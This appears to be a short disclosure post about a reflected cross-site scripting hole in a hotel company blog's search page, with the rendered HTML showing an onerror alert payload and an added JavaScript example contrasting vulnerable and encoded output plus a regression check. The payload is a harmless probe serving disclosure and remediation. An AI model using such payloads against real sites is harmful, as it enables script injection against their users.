XSS vulnerability through search results page.
The search query is sent as a GET parameter and is escaped almost everywhere on the page, except in the heading shown below. Because that one output point reflects the query unencoded, markup supplied in a crafted URL is rendered directly into the page.
    <h1>No Results for <img src=bob onerror=alert()></h1>
    <form class="search_results_form" method="get" id="searchform" action="http://blog.hyatt.com/">
        <input class="textbox_search" type="search" value="<img src=bob onerror=alert()>" name="s" id="s" />
        <input class="button_search" type="submit" id="searchsubmit" value="Search" />
    </form>
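As an added illustration (not code from the original report or from the site), the snippet below reproduces the pattern seen in the markup above, where the form value is encoded but the heading is not, next to the corrected version that encodes every reflection point, plus a small regression check that flags any page in which the raw query text still appears verbatim. The sample query is constructed; only the form markup and blog.hyatt.com URL come from the report.

```javascript
// Minimal HTML encoder for text and double-quoted attribute contexts.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// The search form as it appeared on the page: the value attribute was encoded.
function renderForm(q) {
  return '<form class="search_results_form" method="get" id="searchform" action="http://blog.hyatt.com/">' +
    '<input class="textbox_search" type="search" value="' + escapeHtml(q) + '" name="s" id="s" />' +
    '<input class="button_search" type="submit" id="searchsubmit" value="Search" /></form>';
}

// Pattern from the report: the heading interpolates the raw query (reflected XSS).
function renderVulnerable(q) {
  return '<h1>No Results for ' + q + '</h1> ' + renderForm(q);
}

// Corrected pattern: the same encoder is applied in the heading as well.
function renderFixed(q) {
  return '<h1>No Results for ' + escapeHtml(q) + '</h1> ' + renderForm(q);
}

// Regression check: for a query that contains markup characters, the raw text
// must not appear anywhere in the rendered page. Returns true when every
// reflection point encoded it. (Only meaningful for queries that contain
// characters the encoder changes; a plain word is identical before and after.)
function auditReflection(q, html) {
  return !html.includes(q);
}

// Constructed sample query: harmless markup used only to exercise the check.
const sample = '<b>"probe"</b>';

console.log('vulnerable page passes audit:', auditReflection(sample, renderVulnerable(sample)));
console.log('fixed page passes audit:     ', auditReflection(sample, renderFixed(sample)));
```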
Since I reported this a number of times, they have removed the entire blog. Bit of an extreme response. It is still linked from their homepage, so I'm not sure if it will be coming back without XSS vulnerabilities.